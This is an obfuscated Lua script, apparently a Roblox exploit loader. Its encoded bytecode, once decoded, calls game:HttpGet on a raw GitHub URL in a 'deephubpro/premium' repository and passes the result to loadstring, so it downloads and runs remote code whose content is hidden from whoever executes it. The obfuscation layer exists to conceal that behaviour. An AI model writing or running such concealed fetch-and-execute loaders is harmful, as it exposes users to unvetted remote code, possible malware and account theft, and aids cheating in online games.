--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v89=0;while true do if (v89==0) then v19=v0(v3(v30,1,1));return "";end end else local v90=v2(v0(v30,16));if v19 then local v113=v5(v90,v19);v19=nil;return v113;else return v90;end end end);local function v20(v31,v32,v33) if v33 then local v91=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-1) -(v32-(1 -0))) + (2 -1))) ;return v91-(v91%(620 -((1432 -(282 + 595)) + 64))) ;else local v92=931 -((2494 -(1523 + 114)) + 74) ;local v93;while true do if (v92==(568 -(367 + 201))) then v93=2^(v32-(928 -(214 + 713))) ;return (((v31%(v93 + v93))>=v93) and (1 + 0)) or (0 + 0) ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + 2 + 0 ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if ((4 -3)==v37) then return (v41 * (16777333 -((58 -26) + (155 -70)))) + (v40 * (64226 + 1310)) + (v39 * 256) + v38 ;end if (v37==(0 + 0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (960 -(892 + 65)) );v18=v18 + 4 ;v37=2 -1 ;end end end local function v24() local v42=v23();local v43=v23();local v44=(4 -3) -0 ;local v45=(v20(v43,351 -(87 + 263) ,35 -(9 + 6) ) * ((2 + (0 -0))^(212 -(67 + 113)))) + v42 ;local v46=v20(v43,16 + 5 ,49 -(10 + 8) );local v47=((v20(v43,78 -46 )==(443 -(416 + 26))) and  -(1 + (0 -0))) or (3 -2) ;if (v46==(952 -(802 + 150))) then if (v45==(0 -0)) then return v47 * (0 -(859 -(814 + 45))) ;else v46=1 + 0 ;v44=997 -(915 + 82) ;end elseif (v46==(2477 -(44 + 386))) then return ((v45==((0 -0) -0)) and (v47 * ((1 + 0)/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(2210 -(1069 + 118)) ) * (v44 + (v45/(((42 + 732) -(201 + 571))^((42 + 75) -(950 -(261 + 624)))))) ;end local function v25(v48) local v49;if  not v48 then local v94=1423 -(630 + 793) ;while true do if (v94==(0 -0)) then v48=v23();if (v48==(0 -0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(1 + (0 -0)) );v18=v18 + v48 ;local v50={};for v66=(2828 -(760 + 987)) -(1020 + 60) , #v49 do v50[v66]=v2(v1(v3(v49,v66,v66)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v95,v96,v97,v98,v99,v100,v101,v102,v103) local v104=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if (v104~=(0 -0)) then else local v118=(function() return 0;end)();while true do if (v118~=(1519 -(1191 + 327))) then else v104=(function() return 1;end)();break;end if ((0 + 0)~=v118) then else v95=(function() return 698 -(208 + 490) ;end)();v96=(function() return nil;end)();v118=(function() return 1;end)();end end end if ((1 + 0)~=v104) then else local v119=(function() return 0;end)();while true do if ((0 + 0)==v119) then while true do if (v95~=0) then else v96=(function() return v97();end)();if (v98(v96, #"!", #"|")==0) then local v167=(function() return 836 -(660 + 176) ;end)();local v168=(function() return;end)();local v169=(function() return;end)();local v170=(function() return;end)();while true do if (v167==1) then v170=(function() return {v99(),v99(),nil,nil};end)();if (v168==(202 -(14 + 188))) then local v179=(function() return 0;end)();local v180=(function() return;end)();while true do if (v179~=(675 -(534 + 141))) then else v180=(function() return 0;end)();while true do if (v180~=(0 + 0)) then else v170[ #"91("]=(function() return v99();end)();v170[ #"0313"]=(function() return v99();end)();break;end end break;end end elseif (v168== #"]") then v170[ #"xnx"]=(function() return v100();end)();elseif (v168==(2 + 0)) then v170[ #"xxx"]=(function() return v100() -((2 + 0)^(33 -17)) ;end)();elseif (v168== #"91(") then local v188=(function() return 0 -0 ;end)();local v189=(function() return;end)();while true do if (v188==0) then v189=(function() return 0 -0 ;end)();while true do if ((0 + 0)~=v189) then else v170[ #"-19"]=(function() return v100() -((2 + 0)^(412 -(115 + 281))) ;end)();v170[ #"http"]=(function() return v99();end)();break;end end break;end end end v167=(function() return 4 -2 ;end)();end if (3==v167) then if (v98(v169, #"xnx", #"nil")== #"]") then v170[ #"asd1"]=(function() return v101[v170[ #"0836"]];end)();end v102[v103]=(function() return v170;end)();break;end if (v167~=0) then else local v178=(function() return 0;end)();while true do if ((1 + 0)~=v178) then else v167=(function() return 1;end)();break;end if ((0 -0)==v178) then v168=(function() return v98(v96,7 -5 , #"-19");end)();v169=(function() return v98(v96, #".com",873 -(550 + 317) );end)();v178=(function() return 1;end)();end end end if (v167==(2 -0)) then if (v98(v169, #"[", #"<")== #"|") then v170[2]=(function() return v101[v170[2 -0 ]];end)();end if (v98(v169,5 -3 ,2)~= #" ") then else v170[ #"gha"]=(function() return v101[v170[ #"nil"]];end)();end v167=(function() return 288 -(134 + 151) ;end)();end end end break;end end return v95,v96,v97,v98,v99,v100,v101,v102,v103;end end end end end;end)();local v52=(function() return function(v105,v106,v107) local v108=(function() return 1665 -(970 + 695) ;end)();local v109=(function() return;end)();while true do if (v108~=(0 -0)) then else v109=(function() return 1990 -(582 + 1408) ;end)();while true do if (v109~=(0 -0)) then else local v121=(function() return 0 -0 ;end)();while true do if (v121==0) then v105[v106-#"{" ]=(function() return v107();end)();return v105,v106,v107;end end end end break;end end end;end)();local v53=(function() return {};end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {v53,v54,nil,v55};end)();local v57=(function() return v23();end)();local v58=(function() return {};end)();for v68= #">",v57 do local v69=(function() return 0;end)();local v70=(function() return;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (v69~=1) then else v72=(function() return nil;end)();while true do if (v70~=(0 -0)) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v70=(function() return 1;end)();end if (v70==1) then if (v71== #"~") then v72=(function() return v21()~=(1824 -(1195 + 629)) ;end)();elseif (v71==2) then v72=(function() return v24();end)();elseif (v71~= #"xxx") then else v72=(function() return v25();end)();end v58[v68]=(function() return v72;end)();break;end end break;end if (0==v69) then v70=(function() return 0;end)();v71=(function() return nil;end)();v69=(function() return 1;end)();end end end v56[ #"nil"]=(function() return v21();end)();for v73= #"[",v23() do FlatIdent_51F42,Descriptor,v21,v20,v22,v23,v58,v53,v73=(function() return v51(FlatIdent_51F42,Descriptor,v21,v20,v22,v23,v58,v53,v73);end)();end for v74= #"~",v23() do v54,v74,v28=(function() return v52(v54,v74,v28);end)();end return v56;end local function v29(v60,v61,v62) local v63=v60[1 -0 ];local v64=v60[243 -(187 + 54) ];local v65=v60[(2106 -1323) -(162 + (1198 -(361 + 219))) ];return function(...) local v75=v63;local v76=v64;local v77=v65;local v78=v27;local v79=1;local v80= -(1 + 0);local v81={};local v82={...};local v83=v12("#",...) -(1428 -(41 + 1386)) ;local v84={};local v85={};for v110=(103 -(17 + 86)) -(0 + 0) ,v83 do if (v110>=v77) then v81[v110-v77 ]=v82[v110 + (1 -0) ];else v85[v110]=v82[v110 + 1 ];end end local v86=(v83-v77) + 1 + 0 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1637 -(1373 + (586 -323)) ];if (v88<=((1323 -(53 + 267)) -(451 + 549))) then if (v88<=(1 + 0)) then if (v88==0) then v85[v87[2 -0 ]]={};else v85[v87[2]]=v62[v87[4 -(2 -1) ]];end elseif (v88>(1386 -(169 + 577 + 638))) then local v125=0;local v126;local v127;while true do if (v125==(0 + 0)) then v126=v87[2 -0 ];v127=v85[v87[344 -(218 + 123) ]];v125=1;end if ((v125==1) or (1417>3629)) then v85[v126 + (1582 -(1535 + 46)) ]=v127;v85[v126]=v127[v87[4]];break;end end else v85[v87[2 + 0 ]]=v87[1 + 2 ];end elseif ((4795>402) and (v88<=(565 -(306 + 254)))) then if (v88>(1 + 3)) then do return;end else v85[v87[3 -1 ]]();end elseif (v88<=(1473 -(899 + 568))) then local v130=0;local v131;local v132;local v133;local v134;while true do if (v130==((414 -(15 + 398)) + 0)) then v80=(v133 + v131) -(2 -1) ;v134=(769 -(122 + 44)) -(268 + 335) ;v130=292 -((103 -43) + 230) ;end if ((4813>3565) and (v130==2)) then for v165=v131,v80 do local v166=572 -(426 + 146) ;while true do if (v166==(0 + 0)) then v134=v134 + (1457 -((1264 -(18 + 964)) + 1174)) ;v85[v165]=v132[v134];break;end end end break;end if ((3912==3912) and (v130==(811 -((2141 -1572) + 242)))) then v131=v87[5 -3 ];v132,v133=v78(v85[v131](v13(v85,v131 + 1 + 0 ,v87[3])));v130=1;end end elseif ((2821<=4824) and (v88==(1031 -(706 + 318)))) then local v135=(725 + 526) -(721 + 334 + 196) ;local v136;while true do if (v135==(1271 -(945 + 326))) then v136=v87[4 -2 ];v85[v136]=v85[v136](v13(v85,v136 + 1 ,v80));break;end end else local v137;local v138,v139;local v140;local v141;v85[v87[2 + (0 -0) ]]={};v79=v79 + (701 -(271 + 429)) ;v87=v75[v79];v85[v87[2 + (850 -(20 + 830)) ]]=v62[v87[3]];v79=v79 + (1501 -(1100 + 308 + 92)) ;v87=v75[v79];v85[v87[1088 -((587 -(116 + 10)) + 625) ]]=v62[v87[3]];v79=v79 + (1289 -(74 + 919 + 295)) ;v87=v75[v79];v141=v87[1 + 1 ];v140=v85[v87[1174 -(418 + 753) ]];v85[v141 + 1 + 0 ]=v140;v85[v141]=v140[v87[4]];v79=v79 + 1 ;v87=v75[v79];v85[v87[1 + 0 + 1 ]]=v87[1 + 1 + 1 ];v79=v79 + 1 + 0 ;v87=v75[v79];v141=v87[2];v138,v139=v78(v85[v141](v13(v85,v141 + (530 -((1144 -(542 + 196)) + 123)) ,v87[1772 -((3542 -1793) + 20) ])));v80=(v139 + v141) -(1 + 0) ;v137=1322 -(1249 + 73) ;for v163=v141,v80 do local v164=(0 -0) + 0 ;while true do if (v164==(1145 -((531 -(30 + 35)) + 467 + 212))) then v137=v137 + (2 -1) ;v85[v163]=v138[v137];break;end end end v79=v79 + (2 -1) ;v87=v75[v79];v141=v87[(556 + 1346) -(54 + 52 + 646 + 1148) ];v85[v141]=v85[v141](v13(v85,v141 + 1 + 0 ,v80));v79=v79 + (1258 -(1043 + 214)) + (0 -0) ;v87=v75[v79];v85[v87[5 -3 ]]();v79=v79 + ((4 -2) -1) ;v87=v75[v79];do return;end end v79=v79 + (115 -((1216 -(323 + 889)) + 110)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403523Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F642Q657068756270726F2F7072656D69756D2F726566732F68656164732F6D61696E2F6B68736973642Q62732E6C756100094Q00087Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000200046Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
